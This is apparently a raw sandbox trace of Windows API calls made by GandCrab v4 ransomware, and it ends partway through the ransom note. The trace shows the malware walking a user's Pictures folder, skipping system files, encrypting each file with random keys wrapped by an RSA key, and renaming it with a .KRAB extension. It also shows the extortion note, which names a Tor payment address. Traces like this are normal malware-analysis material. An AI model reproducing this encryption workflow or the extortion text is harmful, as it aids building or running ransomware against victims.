FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0097.333] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0097.333] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0097.333] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\desktop.ini") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\desktop.ini" [0097.333] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0097.333] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\desktop.ini.KRAB") returned 47 [0097.333] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\desktop.ini") returned 42 [0097.333] lstrlenW (lpString=".ini") returned 4 [0097.333] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0097.333] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".ini ") returned 5 [0097.334] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.334] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\desktop.ini") returned 42 [0097.334] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\desktop.ini") returned 42 [0097.334] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0097.334] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.334] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0097.334] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0097.334] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0097.334] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\KRAB-DECRYPT.txt" [0097.334] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0097.335] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\KRAB-DECRYPT.txt.KRAB") returned 52 [0097.335] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\KRAB-DECRYPT.txt") returned 47 [0097.335] lstrlenW (lpString=".txt") returned 4 [0097.335] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0097.335] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0097.335] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.336] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\KRAB-DECRYPT.txt") returned 47 [0097.336] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\KRAB-DECRYPT.txt") returned 47 [0097.336] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0097.336] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0097.336] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0097.336] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0097.336] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0097.336] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0097.336] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0097.336] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0097.336] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0097.336] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0097.336] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.336] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0097.336] lstrcmpW (lpString1="oNi8flHIsYzdQO.gif", lpString2=".") returned 1 [0097.336] lstrcmpW (lpString1="oNi8flHIsYzdQO.gif", lpString2="..") returned 1 [0097.336] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\", lpString2="oNi8flHIsYzdQO.gif" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\oNi8flHIsYzdQO.gif") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\oNi8flHIsYzdQO.gif" [0097.336] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0097.337] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\oNi8flHIsYzdQO.gif.KRAB") returned 54 [0097.337] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\oNi8flHIsYzdQO.gif") returned 49 [0097.337] lstrlenW (lpString=".gif") returned 4 [0097.337] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0097.337] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".gif ") returned 5 [0097.337] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.338] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\oNi8flHIsYzdQO.gif") returned 49 [0097.338] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\oNi8flHIsYzdQO.gif") returned 49 [0097.338] lstrcmpiW (lpString1="oNi8flHIsYzdQO.gif", lpString2="desktop.ini") returned 1 [0097.338] lstrcmpiW (lpString1="oNi8flHIsYzdQO.gif", lpString2="autorun.inf") returned 1 [0097.338] lstrcmpiW (lpString1="oNi8flHIsYzdQO.gif", lpString2="ntuser.dat") returned 1 [0097.338] lstrcmpiW (lpString1="oNi8flHIsYzdQO.gif", lpString2="iconcache.db") returned 1 [0097.338] lstrcmpiW (lpString1="oNi8flHIsYzdQO.gif", lpString2="bootsect.bak") returned 1 [0097.338] lstrcmpiW (lpString1="oNi8flHIsYzdQO.gif", lpString2="boot.ini") returned 1 [0097.338] lstrcmpiW (lpString1="oNi8flHIsYzdQO.gif", lpString2="ntuser.dat.log") returned 1 [0097.338] lstrcmpiW (lpString1="oNi8flHIsYzdQO.gif", lpString2="thumbs.db") returned -1 [0097.338] lstrcmpiW (lpString1="oNi8flHIsYzdQO.gif", lpString2="KRAB-DECRYPT.html") returned 1 [0097.338] lstrcmpiW (lpString1="oNi8flHIsYzdQO.gif", lpString2="KRAB-DECRYPT.txt") returned 1 [0097.338] lstrcmpiW (lpString1="oNi8flHIsYzdQO.gif", lpString2="CRAB-DECRYPT.txt") returned 1 [0097.338] lstrcmpiW (lpString1="oNi8flHIsYzdQO.gif", lpString2="ntldr") returned 1 [0097.338] lstrcmpiW (lpString1="oNi8flHIsYzdQO.gif", lpString2="NTDETECT.COM") returned 1 [0097.338] lstrcmpiW (lpString1="oNi8flHIsYzdQO.gif", lpString2="Bootfont.bin") returned 1 [0097.338] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0097.339] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1011678) returned 1 [0097.339] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0097.340] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0097.340] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0097.340] CryptGenRandom (in: hProv=0x1011678, dwLen=0x20, pbBuffer=0x338f1cc | out: pbBuffer=0x338f1cc) returned 1 [0097.340] CryptReleaseContext (hProv=0x1011678, dwFlags=0x0) returned 1 [0097.340] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.340] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1010df8) returned 1 [0097.341] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0097.341] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0097.341] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0097.341] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x8, pbBuffer=0x338f1ec | out: pbBuffer=0x338f1ec) returned 1 [0097.341] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0097.342] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.342] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1011678) returned 1 [0097.342] CryptImportKey (in: hProv=0x1011678, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd3e0) returned 1 [0097.342] CryptGetKeyParam (in: hKey=0xfbd3e0, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0097.342] CryptEncrypt (in: hKey=0xfbd3e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f15c*=0x100) returned 1 [0097.343] GetLastError () returned 0x0 [0097.343] CryptDestroyKey (hKey=0xfbd3e0) returned 1 [0097.343] CryptReleaseContext (hProv=0x1011678, dwFlags=0x0) returned 1 [0097.343] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1011898) returned 1 [0097.343] CryptImportKey (in: hProv=0x1011898, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd5a0) returned 1 [0097.343] CryptGetKeyParam (in: hKey=0xfbd5a0, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0097.343] CryptEncrypt (in: hKey=0xfbd5a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f15c*=0x100) returned 1 [0097.344] GetLastError () returned 0x0 [0097.344] CryptDestroyKey (hKey=0xfbd5a0) returned 1 [0097.344] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0097.344] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\oNi8flHIsYzdQO.gif" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\oni8flhisyzdqo.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0097.345] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0097.345] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0097.345] ReadFile (in: hFile=0x434, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f1fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338f1fc*=0x12e62, lpOverlapped=0x0) returned 1 [0097.356] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xfffed19e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0097.356] WriteFile (in: hFile=0x434, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x12e62, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338f1f8*=0x12e62, lpOverlapped=0x0) returned 1 [0097.357] WriteFile (in: hFile=0x434, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338f1f8*=0x208, lpOverlapped=0x0) returned 1 [0097.363] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.366] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.366] CloseHandle (hObject=0x434) returned 1 [0097.367] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.367] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\oNi8flHIsYzdQO.gif" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\oni8flhisyzdqo.gif"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\oNi8flHIsYzdQO.gif.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\oni8flhisyzdqo.gif.krab")) returned 1 [0097.367] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.368] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0097.368] lstrcmpW (lpString1="or CEj.jpg", lpString2=".") returned 1 [0097.368] lstrcmpW (lpString1="or CEj.jpg", lpString2="..") returned 1 [0097.368] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\", lpString2="or CEj.jpg" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\or CEj.jpg") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\or CEj.jpg" [0097.368] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0097.368] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\or CEj.jpg.KRAB") returned 46 [0097.368] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\or CEj.jpg") returned 41 [0097.368] lstrlenW (lpString=".jpg") returned 4 [0097.368] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0097.368] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".jpg ") returned 5 [0097.368] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.368] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\or CEj.jpg") returned 41 [0097.368] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\or CEj.jpg") returned 41 [0097.368] lstrcmpiW (lpString1="or CEj.jpg", lpString2="desktop.ini") returned 1 [0097.368] lstrcmpiW (lpString1="or CEj.jpg", lpString2="autorun.inf") returned 1 [0097.368] lstrcmpiW (lpString1="or CEj.jpg", lpString2="ntuser.dat") returned 1 [0097.368] lstrcmpiW (lpString1="or CEj.jpg", lpString2="iconcache.db") returned 1 [0097.369] lstrcmpiW (lpString1="or CEj.jpg", lpString2="bootsect.bak") returned 1 [0097.369] lstrcmpiW (lpString1="or CEj.jpg", lpString2="boot.ini") returned 1 [0097.369] lstrcmpiW (lpString1="or CEj.jpg", lpString2="ntuser.dat.log") returned 1 [0097.369] lstrcmpiW (lpString1="or CEj.jpg", lpString2="thumbs.db") returned -1 [0097.369] lstrcmpiW (lpString1="or CEj.jpg", lpString2="KRAB-DECRYPT.html") returned 1 [0097.369] lstrcmpiW (lpString1="or CEj.jpg", lpString2="KRAB-DECRYPT.txt") returned 1 [0097.369] lstrcmpiW (lpString1="or CEj.jpg", lpString2="CRAB-DECRYPT.txt") returned 1 [0097.369] lstrcmpiW (lpString1="or CEj.jpg", lpString2="ntldr") returned 1 [0097.369] lstrcmpiW (lpString1="or CEj.jpg", lpString2="NTDETECT.COM") returned 1 [0097.369] lstrcmpiW (lpString1="or CEj.jpg", lpString2="Bootfont.bin") returned 1 [0097.369] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0097.369] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1010df8) returned 1 [0097.369] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0097.370] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0097.370] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0097.370] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x20, pbBuffer=0x338f1cc | out: pbBuffer=0x338f1cc) returned 1 [0097.370] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0097.370] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.370] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1010df8) returned 1 [0097.370] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0097.371] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0097.371] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0097.371] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x8, pbBuffer=0x338f1ec | out: pbBuffer=0x338f1ec) returned 1 [0097.371] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0097.371] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.371] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1011018) returned 1 [0097.371] CryptImportKey (in: hProv=0x1011018, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd3e0) returned 1 [0097.371] CryptGetKeyParam (in: hKey=0xfbd3e0, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0097.371] CryptEncrypt (in: hKey=0xfbd3e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f15c*=0x100) returned 1 [0097.372] GetLastError () returned 0x0 [0097.372] CryptDestroyKey (hKey=0xfbd3e0) returned 1 [0097.372] CryptReleaseContext (hProv=0x1011018, dwFlags=0x0) returned 1 [0097.372] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x10113d0) returned 1 [0097.372] CryptImportKey (in: hProv=0x10113d0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd3e0) returned 1 [0097.372] CryptGetKeyParam (in: hKey=0xfbd3e0, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0097.372] CryptEncrypt (in: hKey=0xfbd3e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f15c*=0x100) returned 1 [0097.372] GetLastError () returned 0x0 [0097.372] CryptDestroyKey (hKey=0xfbd3e0) returned 1 [0097.372] CryptReleaseContext (hProv=0x10113d0, dwFlags=0x0) returned 1 [0097.372] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\or CEj.jpg" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\or cej.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0097.373] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0097.373] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0097.373] ReadFile (in: hFile=0x434, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f1fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338f1fc*=0x151ae, lpOverlapped=0x0) returned 1 [0097.384] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xfffeae52, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0097.384] WriteFile (in: hFile=0x434, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x151ae, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338f1f8*=0x151ae, lpOverlapped=0x0) returned 1 [0097.384] WriteFile (in: hFile=0x434, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338f1f8*=0x208, lpOverlapped=0x0) returned 1 [0097.385] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.387] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.388] CloseHandle (hObject=0x434) returned 1 [0097.388] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.388] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\or CEj.jpg" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\or cej.jpg"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\or CEj.jpg.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\or cej.jpg.krab")) returned 1 [0097.388] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.389] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0097.389] lstrcmpW (lpString1="rKkNRoy7mtqm7yma8Hq", lpString2=".") returned 1 [0097.389] lstrcmpW (lpString1="rKkNRoy7mtqm7yma8Hq", lpString2="..") returned 1 [0097.389] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\", lpString2="rKkNRoy7mtqm7yma8Hq" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq" [0097.389] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\" [0097.389] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0097.389] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0097.389] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0097.389] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0097.389] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0097.389] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.390] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0097.390] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\\\KRAB-DECRYPT.txt") returned 68 [0097.390] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\rkknroy7mtqm7yma8hq\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0097.390] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\nlAQAAHPTUHGrjb/dcqUrzDS2xomeC8P4CUSPNAOL+0Mo/RbLr0OaWU1FJb00XfFHXj6tOuf3fPEItNktL2VhtINGOMGKEAUgRHIwxSGaKwcSkEjDUL0HUwplREArY2eQK/2FlKmtVxY2cgAjLoWFXtwo2gEK4a1eyVpOdA/5PKA19vmu9D7IWlFZ8M2v2HcmX1WFwMSKKyCPyE3I12HtIyga2yppmGj/0kbeo4Pyss0DfwD9qQhlmbNwHCOobnSofdvP3cINJt0T+mj6E/gguxJb77VutzLS7ATQylX2An2d2MzGDkSiNzUWV0yDTYzmL5WDSsSyVbWoOteqpx5W43Cfpby5H7iD4Mk5vDzBWPVFeBH4GhKSNudNQl6iOb1l4eeUMuEBXGw0+BpkUrUAgQjBWLbJ6CleUr6MmODOH6A7Jhf60sNPZMijoWaqeecabt0KEf7vwtAKjxeXkDnboIObW61GiYye3Y4Tx1l6X4ZFSnOs4j5jePpy6IWD50Buvy4RFZAKh09rDrTVp5PPV5K0wx5ROUVxEFDMbKemGWn2kbJiiMXWKf9il9ecR7Vj6B9X2QxCxUUzPoOCetcS51SFmTzpNC24BpHiYhlhwBirS7mEqg9eHAs2+76DlthH0IYBlLrEZfZyF2GmyxnNSuiRvf66muc7RQYfG3jxGAECcWKNLqKv8fvy6Z8TXe6Wy3TAJ9Bs4xTAPNS0SMF465Ku6H3cEM/+Sga6KajwZhU3AgixnVgyRE321c0dFCBWzWXYlI72JWaaZIHuktcbpqOd